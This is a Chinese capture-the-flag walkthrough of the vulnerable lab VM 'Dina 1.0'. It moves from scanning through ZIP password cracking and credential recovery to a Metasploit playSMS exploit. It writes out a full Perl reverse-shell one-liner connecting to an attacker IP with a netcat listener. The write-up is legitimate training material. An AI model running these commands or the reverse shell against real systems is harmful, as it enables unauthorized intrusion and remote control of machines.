靶机Dina1.0 – 作者:凯信特安全团队

1、下载靶机 .ova文件,更改网络配置,切换为NET链接。

步骤:选择dina虚拟机,点击“编辑虚拟机设置”,选择“网络适配器”,更改网络连接模式为“net模式” ,确定后开启虚拟机。

图片.png思路:在攻击阶段,首先要确定被攻击主机IP地址,以及端口开放等信息。可通过查看本机IP,扫描该段下的所有IP地址,从中判断开放的主机是哪个,然后进行端口扫描,页面目录扫面,信息收集等。

2、确定在kali攻击机中通过ifconfig查看本机IP。本机IP地址为192.168.42.131。图片.png

3、使用netdiscover -r 192.168.42.0/24进行ARP主机探测。

图片.png4、尝试利用nmap进行端口扫描:nmap -sS 192.168.42.132

图片.png5、尝试访问该地址:192.168.42.132获取web页面。

图片.png通过访问robots.txt查看文件内容。

图片.png访问URL192.168.42.135/nothing发现nothing文件中存在以下备注信息:my secret pass

图片.png6、通过dirb http://192.168.42.132 命令进行目录扫描。

图片.png7、尝试进行目录访问,发现http://192.168.42.132/secure下存在可下载文件backup.zip。下载该文件,该文件已加密。

图片.png思路:发现已加密的文件并且可供下载,尝试下载后访问该文件,查看其中是否有重要信息。

8、使用John The Ripper对密码加密的ZIP包进行爆破。(注意,john对同一个加密文件之后执行一次,执行多次后会如图所示)

步骤:zip2john backup.zip> backup.john

john –format=zip backup.john –wordlist500-worst-passwords.txt

密码为:freedom

图片.png备注:500-worst-passwords.txt该文件为字典文件,可以用以下找到的密码信息新建密码字典。

图片.png在解压中遇到如下错误:

图片.png解决方法:尝试安装7z 。

sudo apt-get install p7zip-full

图片.png使用命令:7za x backup.zip 进行解压。

图片.png9、使用字符串对MP3文件进行解密。

命令:strings backup-cred.mp3

图片.png发现url:192.168.42.133/SecreTSMSgatwayLogin

uname:touhid

password:******

10、访问该URL。用户名:touhid。密码未知。

图片.png在该页面进行源代码查看:发现有如下提示信息。尝试用kurakura进行登录不成功。在首页发现名称dina人名进行登录,不可登录。

图片.png11、尝试用找到的备注密码进行登录猜解。发现密码为diana。

图片.png思路:在进入后台后,查看页面其他内容,发现playsms。可通过metasploit查看相关漏洞看能否利用。

12、我们通过访问主页发现该页面使用playsms(基于web的短信平台)系统。通过msfconsole控制台查看利用相关漏洞。

步骤:

(1)使用“msfconsole“进入matesploit管理。

(2)使用“search palysms”查找playsms相关模块漏洞。图片.png

(3)使用use exploit/multi/http/[laysms_filename_exec 进行漏洞利用。

配置渗透攻击模块中的参数。

(4)如图,使用set命令进行如下参数设置。

图片.png(5)exploit执行后成功,获取meterpreter权限

图片.png(6)新建终端窗口启用Netcat侦听器,尝试从dina机器进行反向shell

nc -nvlp 1234

图片.png在之前的metasploit控制台尝试通过perl写入反向shell语句,命令如下:

sudo perl -e ‘use Socket;$i=”192.168.42.135″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh-i”);};’

图片.png图片.png此时已进获取目标机器shell,进行root/flag.txt查看。

图片.png获取到FLAG。

来源:freebuf.com 2019-01-04 15:19:27 by: 凯信特安全团队

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论